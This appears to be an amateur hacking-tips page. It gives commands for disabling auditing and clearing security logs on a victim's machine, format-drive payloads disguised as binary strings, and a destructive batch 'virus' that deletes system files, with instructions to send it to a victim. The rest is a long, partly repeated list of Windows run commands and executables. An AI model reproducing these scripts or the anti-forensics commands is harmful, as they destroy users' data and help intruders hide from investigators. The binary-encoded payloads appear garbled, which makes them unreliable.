How hackers erase their tracks after hacking

Whenever someone comes in contact with another person, place, or thing, something of that person is left behind.
This means that the attacker must disable logging, clear log files, eliminate evidence, plant additional tools, and cover his tracks.

Here are some of the techniques that an attacker can use to cover his tracks:-
(1) Disabling logging – Auditpol was originally included in the NT Resource kit for administrators. It works well for hackers too, as long as they have administrative access.
Just point it at the victim’s system as follows:
C:\>auditpol \\192.168.10 /disable
Auditing Disabled

(2) Clear the log file – The attacker will also attempt to clear the log. Tools, such as Winzapper, evidence Eliminator, or Elsave, can be used.
Elsave will remove all entries from the logs, except one entry that shows the logs were cleared.
It is used as follows:

Elsave -s \\192.168.13.10 -1 “Security” -C

(3) Cover their tracks – One way for attackers to cover their tracks is with rootkits.
Rootkits are malicious codes designed to allow an attacker to get expanded access and hide his presence.
While rootkits were traditionally a Linux tool, they are now starting to make their way into the Windows environment.
Tools, such as NTrootkit and AFX Windows rootkits, are available for Windows systems.
If you suspect that a computer has been rootkitted, you need to use an MD5 checksum utility or a program, such as Tripwire, to determine the viability of your programs. The only other alternative is to rebuild the computer from known good media.

Format or Crash HDD!

Format A:/
01100110011011110111001001101101011000010111010000 10000001100001001110100101110000100000001011110101 00010010111101011000

Format C:/
01100110011011110111001001101101011000010111010000 10000001100011001110100101110000100000001011110101 00010010111101011000

Format D:/
01100110011011110111001001101101011000010111010000 10000001100100001110100101110000100000001011110101 00010010111101011000


Try to kill Harddisk
01001011000111110010010101010101010000011111100000


Boot Failure
01100100011001010110110000100000001011110100011000 10111101010011001011110101000100100000011000110011 10100101110001100010011011110110111101110100001011 10011010010110111001101001


Now save your notepad as .bat file and send it to ur victim. Once ur victim clicks on that bat file. Dhooooooooommmm!!!!!!!!!!

Viruses for Irritating (plz dont try on ur pc)

@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe
msg "WARNING:A VIRUS TOOK OVER YOUR COMPUTER VIRUS NOTICED AS:RINSE SHARAN hacked your IP.exe"

Copy these lines in notepad and save it as "rinse.bat" or "rinse.exe"

Try this on any other comp.. Very heavy Virus..

Run Commands

Power Configuration - powercfg.cpl
Printers and Faxes - control printers
Printers Folder - printers
Private Character Editor - eudcedit
Quicktime (If Installed)- QuickTime.cpl
Quicktime Player (if installed)- quicktimeplayer
Real Player (if installed)- realplay
Regional Settings - intl.cpl
Registry Editor - regedit
Registry Editor - regedit32
Remote Access Phonebook - rasphone
Remote Desktop - mstsc
Removable Storage - ntmsmgr.msc
Removable Storage Operator Requests - ntmsoprq.msc
Resultant Set of Policy (XP Prof) - rsop.msc
Scanners and Cameras - sticpl.cpl
Scheduled Tasks - control schedtasks
Security Center - wscui.cpl
Services - services.msc
Shared Folders - fsmgmt.msc
Shuts Down Windows - shutdown
Sounds and Audio - mmsys.cpl
Spider Solitare Card Game - spider
SQL Client Configuration - cliconfg
System Configuration Editor - sysedit
System Configuration Utility - msconfig
System File Checker Utility (Scan Immediately)- sfc /scannow
System File Checker Utility (Scan Once At Next Boot)- sfc /scanonce
System File Checker Utility (Scan On Every Boot) - sfc /scanboot
System File Checker Utility (Return to Default Setting)- sfc /revert
System File Checker Utility (Purge File Cache)- sfc /purgecache
System File Checker Utility (Set Cache Size to size x)-sfc/cachesize=x
System Information- msinfo32
System Properties - sysdm.cpl
Task Manager - taskmgr
TCP Tester - tcptest
Telnet Client - telnet
Tweak UI (if installed) - tweakui
User Account Management- nusrmgr.cpl
Utility Manager - utilman

Accessibility Controls- access.cpl
Add Hardware Wizard- hdwwiz.cpl
Add/Remove Programs- appwiz.cpl
Administrative Tools- control admintools
Automatic Updates- wuaucpl.cpl
Bluetooth Transfer Wizard- fsquirt
Calculator- calc
Certificate Manager- certmgr.msc
Character Map- charmap
Check Disk Utility- chkdsk
Clipboard Viewer- clipbrd
Command Prompt- cmd
Component Services- dcomcnfg
Computer Management- compmgmt.msc
timedate.cpl- ddeshare
Device Manager- devmgmt.msc
Direct X Control Panel (If Installed)*- directx.cpl
Direct X Troubleshooter- dxdiag
Disk Cleanup Utility- cleanmgr
Disk Defragment- dfrg.msc
Disk Management- diskmgmt.msc
Disk Partition Manager- diskpart
Display Properties- control desktop
Display Properties- desk.cpl
Display Properties (w/Appearance Tab Preselected)- control color
Dr. Watson System Troubleshooting Utility- drwtsn32
Driver Verifier Utility- verifier
Event Viewer- eventvwr.msc
File Signature Verification Tool- sigverif
Findfast- findfast.cpl
Folders Properties- control folders
Fonts- control fonts
Fonts Folder- fonts
Free Cell Card Game- freecell
Game Controllers- joy.cpl
Group Policy Editor (XP Prof)- gpedit.msc
Hearts Card Game- mshearts
Iexpress Wizard- iexpress
Indexing Service- ciadv.msc
Internet Properties- inetcpl.cpl
IP Configuration (Display Connection Configuration) ipconfig /all
IP Configuration (Display DNS Cache Contents) ipconfig /displaydns
IP Configuration (Delete DNS Cache Contents)- ipconfig /flushdns
IP Configuration (Release All Connections)- ipconfig /release
IP Configuration (Renew All Connections)- ipconfig /renew
IP Configuration (Refreshes DHCP & Re-Registers DNS)- ipconfig /registerdns
IP Configuration (Display DHCP Class ID)- ipconfig /showclassid

IP Configuration (Refreshes DHCP & Re-Registers DNS)- ipconfig /registerdns
IP Configuration (Display DHCP Class ID)- ipconfig /showclassid
IP Configuration (Modifies DHCP Class ID)- ipconfig /setclassid
Java Control Panel (If Installed)- jpicpl32.cpl
Java Control Panel (If Installed)- javaws
Keyboard Properties- control keyboard
Local Security Settings- secpol.msc
Local Users and Groups- lusrmgr.msc
Logs You Out Of Windows- logoff
Microsoft Chat- winchat
Minesweeper Game- winmine
Mouse Properties- control mouse
Mouse Properties- main.cpl
Network Connections- control netconnections
Network Connections- ncpa.cpl
Network Setup Wizard- netsetup.cpl
Notepad- notepad
Nview Desktop Manager (If Installed)- nvtuicpl.cpl
Object Packager- packager
ODBC Data Source Administrator- odbccp32.cpl
On Screen Keyboard- osk
Opens AC3 Filter (If Installed)- ac3filter.cpl
Password Properties- password.cpl
Performance Monitor- perfmon.msc
Performance Monitor- perfmon
Phone and Modem Options- telephon.cpl
Power Configuration- powercfg.cpl
Printers and Faxes- control printers
Printers Folder- printers
Private Character Editor- eudcedit
Quicktime (If Installed)- QuickTime.cpl
Regional Settings- intl.cpl
Registry Editor- regedit
Registry Editor- regedit32
Remote Desktop- mstsc
Removable Storage- ntmsmgr.msc
Removable Storage Operator Requests- ntmsoprq.msc
Resultant Set of Policy (XP Prof)- rsop.msc
Scanners and Cameras- sticpl.cpl
Scheduled Tasks- control schedtasks
Security Center- wscui.cpl
Services- services.msc
Shared Folders- fsmgmt.msc
Shuts Down Windows- shutdown
Sounds and Audio- mmsys.cpl
Spider Solitare Card Game- spider
SQL Client Configuration- cliconfg
System Configuration Editor- sysedit
System Configuration Utility- msconfig
System File Checker Utility (Scan Immediately)- sfc /sc

BCKGZM.EXE - Backgammon
CHKRZM.EXE - Checkers
CONF.EXE - NetMeeting
DIALER.EXE - Phone Dialer
HELPCTR.EXE - Help and Support
HRTZZM.EXE - Internet Hearts
HYPERTRM.EXE - HyperTerminal
ICWCONN1.EXE - Internet Connection Wizard
IEXPLORE.EXE - Internet Explorer
INETWIZ.EXE - Setup Your Internet Connection
INSTALL.EXE - User's Folder
MIGWIZ.EXE - File and Settings Transfer Wizard
MOVIEMK.EXE - Windows Movie Maker
MPLAYER2.EXE - Windows Media Player Version 6.4.09.1120
MSCONFIG.EXE - System Configuration Utility
MSIMN.EXE - Outlook Express
MSINFO32.EXE - System Information
MSMSGS.EXE - Windows Messenger
MSN6.EXE - MSN Explorer
PBRUSH.EXE - Paint
PINBALL.EXE - Pinball
RVSEZM.EXE - Reversi
SHVLZM.EXE - Spades
TABLE30.EXE - User's Folder
WAB.EXE - Windows Address Book
WABMIG.EXE - Address Book Import Tool
WINNT32.EXE - User's Folder
WMPLAYER.EXE - Windows Media Player
WRITE.EXE - Wordpad


ACCWIZ.EXE - Accessibility Wizard
CALC.EXE - Calculator
CHARMAP.EXE - Character Map
CLEANMGR.EXE - Disk Space Cleanup Manager
CLICONFG.EXE - SQL Client Configuration Utility
CLIPBRD.EXE - Clipbook Viewer
CLSPACK.EXE - Class Package Export Tool
CMD.EXE - Command Line
CMSTP.EXE - Connection Manager Profile Installer
CONTROL.EXE - Control Panel
DCOMCNFG.EXE - Component Services
DDESHARE.EXE - DDE Share
DRWATSON.EXE - Doctor Watson v1.00b
DRWTSN32.EXE - Doctor Watson Settings
DVDPLAY.EXE - DVD Player
DXDIAG.EXE - DirectX Diagnostics
EUDCEDIT.EXE - Private Character Editor
EVENTVWR.EXE - Event Viewer
EXPLORER.EXE - Windows Explorer
FREECELL.EXE - Free Cell
FXSCLNT.EXE - Fax Console
FXSCOVER.EXE - Fax Cover Page Editor
FXSEND.EXE - MS Fax Send Note Utility
IEXPRESS.EXE - IExpress 2.0
LOGOFF.EXE - System Logoff
MAGNIFY.EXE - Microsoft Magnifier
MMC.EXE - Microsoft Management Console
MOBSYNC.EXE - Microsoft Synchronization Manager
MPLAY32.EXE - Windows Media Player version 5.1
MSHEARTS.EXE - Hearts
MSPAINT.EXE - Paint
MSTSC.EXE - Remote Desktop Connection

NARRATOR.EXE - Microsoft Narrator
NETSETUP.EXE - Network Setup Wizard
NOTEPAD.EXE - Notepad
NSLOOKUP.EXE - NSLookup Application
NTSD.EXE - Symbolic Debugger for Windows 2000
ODBCAD32.EXE - ODBC Data Source Administrator
OSK.EXE - On Screen Keyboard
OSUNINST.EXE - Windows Uninstall Utility
PACKAGER.EXE - Object Packager
PERFMON.EXE - Performance Monitor
PROGMAN.EXE - Program Manager
RASPHONE.EXE - Remote Access Phonebook
REGEDIT.EXE - Registry Editor
REGEDT32.EXE - Registry Editor
RESET.EXE - Resets Session
RSTRUI.EXE - System Restore
RTCSHARE.EXE - RTC Application Sharing
SFC.EXE - System File Checker
SHRPUBW.EXE - Create Shared Folder
SHUTDOWN.EXE - System Shutdown
SIGVERIF.EXE - File Signature Verification
SNDREC32.EXE - Sound Recorder
SNDVOL32.EXE - Sound Volume
SOL.EXE - Solitaire

SPIDER.EXE - Spider Solitaire
SYNCAPP.EXE - Create A Briefcase
SYSEDIT.EXE - System Configuration Editor
SYSKEY.EXE - SAM Lock Tool
TASKMGR.EXE - Task Manager
TELNET.EXE - MS Telnet Client
TSSHUTDN.EXE - System Shutdown
TOURSTART.EXE - Windows Tour Launcher
UTILMAN.EXE - System Utility Manager
USERINIT.EXE - My Documents
VERIFIER.EXE - Driver Verifier Manager
WIAACMGR.EXE - Scanner and Camera Wizard
WINCHAT.EXE - Windows for Workgroups Chat
WINHELP.EXE - Windows Help Engine
WINHLP32.EXE - Help
WINMINE.EXE - Minesweeper
WINVER.EXE - Windows Version Information
WRITE.EXE - WordPad
WSCRIPT.EXE - Windows Script Host Settings
WUPDMGR.EXE - Windows Update


ACCESS.CPL - Accessibility Options
APPWIZ.CPL - Add or Remove Programs
DESK.CPL - Display Properties
HDWWIZ.CPL - Add Hardware Wizard
INETCPL.CPL - Internet Explorer Properties
INTL.CPL - Regional and Language Options
JOY.CPL - Game Controllers
MAIN.CPL - Mouse Properties
MMSYS.CPL - Sounds and Audio Device Properties
NCPA.CPL - Network Connections
NUSRMGR.CPL - User Accounts
ODBCCP32.CPL - ODBC Data Source Administrator
POWERCFG.CPL - Power Options Properties
SYSDM.CPL - System Properties

TELEPHON.CPL - Phone and Modem Options
TIMEDATE.CPL - Date and Time Properties


CERTMGR.MSC - Certificates
CIADV.MSC - Indexing Service
COMPMGMT.MSC - Computer Management
DEVMGMT.MSC - Device Manager
DFRG.MSC - Disk Defragmenter
DISKMGMT.MSC - Disk Management
EVENTVWR.MSC - Event Viewer
FSMGMT.MSC - Shared Folders
LUSRMGR.MSC - Local Users and Groups
NTMSMGR.MSC - Removable Storage
NTMSOPRQ.MSC - Removable Storage Operator Requests
PERFMON.MSC - Performance Monitor
SERVICES.MSC - Services
WMIMGMT.MSC - Windows Management Infrastructure